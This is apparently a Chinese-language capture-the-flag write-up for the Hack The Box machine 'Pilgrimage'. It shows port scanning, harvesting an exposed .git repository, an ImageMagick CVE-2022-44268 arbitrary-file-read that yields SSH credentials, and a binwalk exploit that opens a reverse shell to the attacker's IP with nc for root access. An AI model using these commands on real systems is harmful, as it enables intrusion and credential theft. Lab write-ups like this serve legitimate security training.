端口扫描

扫描所有端口并且使用nmap的默认脚本对开放的端口进行漏洞测试

 nmap -sT -sV -sC -p- 10.10.11.219 -T4 -v -oA port-scan

直接访问web页面时发现会自动跳转到这个url ，https://pilgrimage.htb/ 我们这里需要绑定一个hosts

绑定hosts，可以看到这是一个上传文件的页面，接下来我们进行目录扫描

 echo "10.10.11.219  pilgrimage.htb" >> /etc/hosts

目录扫描

这里扫出很多目录，发现存在 /.git 泄露，我们直接使用.git泄露利用工具把泄露的目录或文件都爬下来

 dirsearch -u http://pilgrimage.htb/

项目地址：https://github.com/denny0223/scrabble

执行脚本下载所有泄露的目录及文件

 ./scrabble http://pilgrimage.htb/

下载完之后就有这些文件

Getshell

这看到在  index.php 文件中使用了magick工具对上传后的文件进行了处理

我们把下载的 magick 工具进行运行后发现版本，ImageMagick 7.1.0-49

 chmod +x magick
 ./magick --version

查找公开的poc或exp发现存在两个一个DOS攻击另一个是任意文件读取的，我们试试任意文件读取

复制到当前目录下

 searchsploit -m 51261 ./

CVE-2022-44268

打开后直接我们poc地址，接下来直接下载利用即可

项目地址：https://github.com/voidz0r/CVE-2022-44268

这里直接执行需要读取的系统文件就可以了，执行后会生成一个 image.png 的文件

 cargo run "/etc/passwd"

上传至网页中

上传成功后用wget再把这个图片下载下来

 wget http://pilgrimage.htb/shrunk/653d1de190f03.png

使用identify 工具查看图片详细信息

 identify -verbose 653d1de190f03.png

把这一串HEX编码后的字符进行解码后就可以看到读取文件的结果了

接下来我们继续读取源码中的这个文件

读取后发现了存在数据库执行的sql语句

这里发现了用户名及密码，第一次以为这是个密码，没想到用户名在下面.....

用户名：emily

密码：abigchonkyboi123

权限提升

登录ssh

查看进程查看sh脚本文件，这里有一个文件引起我们的注意，/usr/sbin/malwarescan.sh

 ps aux | grep sh

查看该脚本文件中代码

 #!/bin/bash
 
 blacklist=("Executable script" "Microsoft executable") #黑名单列表
 
 /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do 
 #使用inotifywait工具进行监控目录/var/www/pilgrimage.htb/shrunk/一旦发现有创建文件的行为就把文件名(绝对路径)给FILE
         filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')" # 将绝对路径处理好给filename
         binout="$(/usr/local/bin/binwalk -e "$filename")" # 使用binwalk工具查看文件扩展
         for banned in "${blacklist[@]}"; do
                 if [[ "$binout" == *"$banned"* ]]; then # 如果文件扩展在黑名单列表中就执行rm删除文件
                    /usr/bin/rm "$filename" 
                    break
                 fi
         done
 done
 

查看可以看到 binwalk 工具的版本号，我们接下来查找Nay

还真有，就这一个而且是RCE

 searchsploit binwalk 2.3.2

这里随便给一个图片就可以了，ip和端口就是我们反弹nc的地址

 python 51249.py image.png 10.10.16.19 1399

执行成功后，会在当前目录生成一个图片

nc监听端口1399

 nc -lvnp 1399

使用wget下载到服务器目录/var/www/pilgrimage.htb/shrunk/，拿到root权限

原文始发于微信公众号（web安全初心实验室）：HTB-Pilgrimage